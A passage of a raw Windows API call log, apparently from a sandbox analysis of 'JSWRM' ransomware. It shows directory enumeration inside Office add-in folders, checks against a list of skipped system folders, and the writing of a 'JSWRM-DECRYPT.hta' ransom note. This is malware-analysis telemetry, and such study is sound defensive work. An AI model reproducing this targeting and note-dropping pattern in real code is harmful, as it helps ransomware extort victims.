(lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.053] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.053] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.053] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.053] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.053] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0123.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0123.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f4d0 [0123.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21be68 | out: hHeap=0x1e0000) returned 1 [0123.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.054] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5eb74f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5eb74f1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5f4ff2d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x91040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0123.054] FindClose (in: hFindFile=0x232140 | out: hFindFile=0x232140) returned 1 [0123.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0123.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0123.054] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf472b09c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf472b09c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf475131d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4fe050, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="DocumentFormat.OpenXml.dll", cAlternateFileName="DOCUME~1.DLL")) returned 1 [0123.054] lstrcmpiW (lpString1="DocumentFormat.OpenXml.dll", lpString2=".") returned 1 [0123.054] lstrcmpiW (lpString1="DocumentFormat.OpenXml.dll", lpString2="..") returned 1 [0123.054] lstrcmpiW (lpString1="DocumentFormat.OpenXml.dll", lpString2="...") returned 1 [0123.054] lstrcmpiW (lpString1="DocumentFormat.OpenXml.dll", lpString2="windows") returned -1 [0123.054] lstrcmpiW (lpString1="DocumentFormat.OpenXml.dll", lpString2="recovery") returned -1 [0123.054] lstrcmpiW (lpString1="DocumentFormat.OpenXml.dll", lpString2="perflogs") returned -1 [0123.054] lstrcmpiW (lpString1="DocumentFormat.OpenXml.dll", lpString2="documents and settings") returned -1 [0123.054] lstrcmpiW (lpString1="DocumentFormat.OpenXml.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.054] lstrcmpiW (lpString1="DocumentFormat.OpenXml.dll", lpString2="system volume information") returned -1 [0123.054] lstrcmpiW (lpString1="DocumentFormat.OpenXml.dll", lpString2="msocache") returned -1 [0123.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DocumentFormat.OpenXml.dll", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0123.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0123.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DocumentFormat.OpenXml.dll", cchWideChar=26, lpMultiByteStr=0x241060, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DocumentFormat.OpenXml.dll", lpUsedDefaultChar=0x0) returned 26 [0123.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0123.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0123.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DocumentFormat.OpenXml.dll", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0123.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0123.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DocumentFormat.OpenXml.dll", cchWideChar=26, lpMultiByteStr=0x241358, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DocumentFormat.OpenXml.dll", lpUsedDefaultChar=0x0) returned 26 [0123.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0123.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e7a0 [0123.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0123.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0123.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0123.055] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6c93006, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c93006, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="el", cAlternateFileName="")) returned 1 [0123.055] lstrcmpiW (lpString1="el", lpString2=".") returned 1 [0123.055] lstrcmpiW (lpString1="el", lpString2="..") returned 1 [0123.055] lstrcmpiW (lpString1="el", lpString2="...") returned 1 [0123.055] lstrcmpiW (lpString1="el", lpString2="windows") returned -1 [0123.055] lstrcmpiW (lpString1="el", lpString2="recovery") returned -1 [0123.055] lstrcmpiW (lpString1="el", lpString2="perflogs") returned -1 [0123.055] lstrcmpiW (lpString1="el", lpString2="documents and settings") returned 1 [0123.055] lstrcmpiW (lpString1="el", lpString2="$RECYCLE.BIN") returned 1 [0123.055] lstrcmpiW (lpString1="el", lpString2="system volume information") returned -1 [0123.055] lstrcmpiW (lpString1="el", lpString2="msocache") returned -1 [0123.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0123.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0123.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.055] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\el\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\el\\jswrm-decrypt.hta")) returned 0xffffffff [0123.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0123.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0123.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b480 [0123.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b480 | out: hHeap=0x1e0000) returned 1 [0123.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\el\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\el\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.059] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.059] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.060] CloseHandle (hObject=0x338) returned 1 [0123.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0123.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0123.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b480 [0123.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0123.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0123.061] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\el\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\el\\jswrm-decrypt.hta")) returned 0x20 [0123.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b480 | out: hHeap=0x1e0000) returned 1 [0123.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0123.061] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\el\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6c93006, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4001d1d3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0123.061] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.061] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6c93006, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4001d1d3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.061] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.061] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.061] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4001d1d3, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4001d1d3, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4001d1d3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.061] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.061] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.061] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.061] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.061] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.061] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.061] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.061] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.061] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.061] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0123.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0123.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0123.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0123.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0123.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0123.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0123.062] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x231c662, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x231c662, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x231c662, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.062] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.062] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.062] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.062] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.062] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.062] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.062] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.062] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.062] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.062] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0123.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0123.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0123.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0123.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x21be68 [0123.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.063] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6c93006, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6c93006, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c93006, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x33040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.063] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.063] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.063] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.063] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.063] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.063] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.063] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.063] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.063] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.063] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0123.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0a0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0123.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0123.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, 